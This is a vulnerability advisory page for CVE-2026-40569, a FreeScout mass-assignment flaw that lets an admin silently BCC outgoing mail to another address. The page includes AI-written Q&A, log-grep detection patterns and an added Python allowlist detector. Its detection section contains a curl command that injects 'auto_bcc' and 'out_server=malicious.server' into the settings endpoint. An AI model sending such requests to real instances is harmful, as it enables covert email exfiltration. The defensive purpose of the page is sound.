CVE-2026-40569
Mass Assignment Vulnerability in FreeScout Mailbox Enables Email Exfiltration
Publication date: 2026-04-21
Last updated on: 2026-04-21
Assigner: GitHub, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| freescout | freescout | all versions before 1.8.213 (1.8.213 itself not affected) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
| CWE-915 | The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability allows an authenticated admin to silently and persistently exfiltrate all outgoing emails by injecting unauthorized mailbox settings such as auto_bcc, which sends copies of emails to an attacker-controlled address without detection.
This undetectable exfiltration of potentially sensitive customer and communication data can lead to violations of data protection regulations such as GDPR and HIPAA, which require strict controls over personal and health information confidentiality and integrity.
By enabling attackers to redirect emails through malicious servers, inject phishing content, or disable encryption, the vulnerability compromises the confidentiality, integrity, and availability of email communications, further risking non-compliance with these standards.
In multi-admin environments or when admin sessions are compromised, this vulnerability can lead to large-scale, persistent breaches of sensitive data, undermining regulatory compliance obligations related to access control, data security, and breach notification.
Can you explain this vulnerability to me?
CVE-2026-40569 is a critical mass assignment vulnerability in FreeScout versions prior to 1.8.213 affecting the mailbox connection settings endpoints. The vulnerability arises because the methods handling incoming and outgoing mailbox connection settings (`connectionIncomingSave()` and `connectionOutgoingSave()`) pass all HTTP request parameters directly to the mailbox model's `fill()` method without filtering or allowlisting fields.
This allows an authenticated admin user to overwrite any of the 32 writable fields in the mailbox model, including sensitive security-related fields that are not normally exposed on the connection settings forms, such as `auto_bcc`, `out_server`, `out_password`, `signature`, and `auto_reply_enabled`.
Because validation is missing or insufficient, an attacker can inject hidden parameters (e.g., `auto_bcc=<attacker-controlled address>`) into otherwise legitimate requests, enabling silent and persistent manipulation of mailbox behavior. For example, the `auto_bcc` field causes every outgoing email to be silently BCC'd to the attacker without any UI indication or logging.
Other attack possibilities include redirecting outgoing SMTP traffic through attacker-controlled servers, injecting phishing links or tracking pixels into email signatures, and enabling malicious auto-replies. This vulnerability is especially dangerous in multi-admin environments or if an admin session is compromised.
How can this vulnerability impact me?
This vulnerability can have severe impacts including complete compromise of mailbox confidentiality and integrity. An attacker with admin access can silently exfiltrate all outgoing emails by injecting an `auto_bcc` address, allowing them to receive copies of all communications without detection.
Additionally, the attacker can redirect outgoing emails through malicious SMTP servers, enabling interception, modification, or phishing attacks. They can also inject malicious content such as tracking pixels or phishing links into email signatures or enable automated phishing auto-replies.
Because the injected changes are invisible on the connection settings form, other administrators are unlikely to detect the compromise. The attacker gains persistent control that survives session expiry, leading to long-term undetected data leakage and potential large-scale compromise of email communications.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring HTTP requests to the mailbox connection settings endpoints in FreeScout, specifically the POST requests to the endpoints handled by the methods `connectionIncomingSave()` and `connectionOutgoingSave()` in `app/Http/Controllers/MailboxesController.php`.
Look for requests that include unexpected or hidden parameters such as `auto_bcc`, `out_server`, `out_password`, `signature`, `auto_reply_enabled`, or `auto_reply_message`, which are not normally present in the connection settings forms.
Detection can be done by intercepting and inspecting HTTP traffic using tools like Burp Suite or by analyzing web server logs for suspicious POST parameters.
Example commands to detect suspicious requests include:
- Using curl to test whether unauthorized fields can be set (replace the URL, the placeholder address, and the authentication with values for your own instance): curl -X POST -d "auto_bcc=<attacker-controlled address>&out_server=malicious.server" -u admin:password https://your-freescout-instance/api/mailbox/connectionOutgoingSave
- Using grep on web server logs to find suspicious parameters: grep -E 'auto_bcc|out_password|auto_reply_enabled' /var/log/nginx/access.log (note that a default access log records only the request line, so parameters sent in a POST body appear there only if request-body logging is enabled or the parameters were passed in the query string).
- Using Burp Suite or similar HTTP proxy to intercept and inspect POST requests to mailbox connection settings endpoints for unexpected parameters.
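The following added example (not FreeScout's code and not part of the original advisory) puts the mechanism described above and the detection list into one runnable piece: a per-endpoint allowlist applied before mass assignment, as the fix describes, and the same allowlist used to flag request bodies carrying fields the connection forms should never submit. The field names in the allowlists, the endpoint labels and the sample bodies are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

# Illustrative per-endpoint allowlists (assumed for this example; FreeScout's
# real form field names and the upstream fix's key set may differ).
ALLOWED_FIELDS = {
    "incoming": {"in_server", "in_port", "in_username", "in_password",
                 "in_protocol", "in_encryption"},
    "outgoing": {"out_method", "out_server", "out_port", "out_username",
                 "out_password", "out_encryption"},
}
# Framework keys that are not model attributes (Laravel CSRF token, method spoofing).
FRAMEWORK_KEYS = {"_token", "_method"}
# Mailbox fields the advisory names as sensitive when injected outside their own form.
SENSITIVE_FIELDS = {"auto_bcc", "out_server", "out_password", "signature",
                    "auto_reply_enabled", "auto_reply_message"}

def parse_form_body(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body into {key: last value}."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}

def safe_fill(params: dict, endpoint: str) -> dict:
    """The fixed pattern: drop everything outside the endpoint's allowlist before
    the values reach a mass-assignment call (the $request->only() idea)."""
    return {k: v for k, v in params.items() if k in ALLOWED_FIELDS[endpoint]}

def injected_fields(params: dict, endpoint: str) -> set:
    """Detection: parameters this form is not expected to submit."""
    return set(params) - ALLOWED_FIELDS[endpoint] - FRAMEWORK_KEYS

def scan_requests(requests):
    """Return (endpoint, unexpected keys, sensitive subset) for each suspicious
    (endpoint, body) pair, e.g. from a proxy that logs request bodies."""
    findings = []
    for endpoint, body in requests:
        extra = injected_fields(parse_form_body(body), endpoint)
        if extra:
            findings.append((endpoint, extra, extra & SENSITIVE_FIELDS))
    return findings

# Constructed sample bodies, not captured traffic; the address is a placeholder.
SAMPLE_REQUESTS = [
    ("outgoing", "_token=t1&out_method=smtp&out_server=smtp.example.net&out_port=587"
                 "&out_username=helpdesk&out_password=pw&out_encryption=tls"),
    ("incoming", "_token=t1&in_server=imap.example.net&in_port=993&in_username=helpdesk"
                 "&in_password=pw&in_protocol=imap&in_encryption=ssl"
                 "&auto_bcc=ATTACKER_ADDRESS_PLACEHOLDER&signature=injected"),
]

if __name__ == "__main__":
    for endpoint, extra, sensitive in scan_requests(SAMPLE_REQUESTS):
        print(f"{endpoint}: unexpected={sorted(extra)} sensitive={sorted(sensitive)}")
```

Feeding real bodies requires a proxy or application-level log that captures POST parameters; the allowlist is the single source of truth for both the fill filter and the alert rule, so extending one extends the other.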
What immediate steps should I take to mitigate this vulnerability?
The immediate and recommended step to mitigate this vulnerability is to upgrade FreeScout to version 1.8.213 or later, where the issue has been fixed.
The fix involves restricting which fields can be populated on the mailbox fetching and sending settings pages by filtering input parameters to only allow a predefined set of safe keys.
- Upgrade FreeScout to version 1.8.213 or newer.
- Ensure that the `connectionIncomingSave()` and `connectionOutgoingSave()` methods only accept and save allowed fields, preventing mass assignment of unauthorized fields.
- Restore and enable proper validation on incoming parameters for mailbox connection settings.
- Monitor admin activity and audit mailbox settings for suspicious changes, especially to hidden fields like `auto_bcc`.
If immediate upgrade is not possible, restrict admin access and monitor for suspicious POST requests to mailbox connection endpoints to reduce risk.